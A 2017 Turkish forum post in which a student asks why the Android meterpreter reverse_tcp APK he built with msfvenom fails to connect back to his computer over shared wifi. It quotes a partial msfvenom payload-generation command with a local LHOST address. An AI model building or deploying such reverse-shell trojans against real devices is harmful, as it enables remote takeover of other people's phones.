1. Duyuruyu Kapat

acil yardım lütfen

'Soru & Cevap' forumunda BandoLero tarafından 11 Kasım 2017 tarihinde açılan konu

1. BandoLero

BandoLero New Member

Ben üni okuyorum apartta kalıyorum ve internete wifi üzerinden bağlanıyorum.Sıkıntım şurada oldu wifi şifresiz herkes yani herkes bağlanabilmekte ama giriş yapmak için tarayıcıda bir panele üyelik alıp öyle giriş yapılmakta ben üyeliği aldım kiracı olduğum için internete girebiliyorum.Şimdi asıl sorun kali linux üzerinde msfvenom ile yaptığım trojan diye geçiyo galiba emin değilim adını android için apk halinde oluyo biliyodur zaten herkes bunu.şimdi şöyle anlatayım msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.186 ip si benim cihazımdaki ip olarak herşeyi hatasız yapıyorum ve geri kalanı ile telefonuma apk dosyasını atıp bilgisayardan exploit ettiğimde çalışmadığını fark ettim sonra telefonun ip sine baktığımda 192.168.0.173 olduğunu anladım bu yüzden bağlantı sağlayamadım ve etrafımda ve çevremde bu durumdan anlayan birini bulamadığım için buraya yazdım yardım eden olur illaki diye.İnşAllah yanlış bi yere yazmamışımdır yardımlarınızı bekliyorum

Bu Sayfayı Paylaş

Share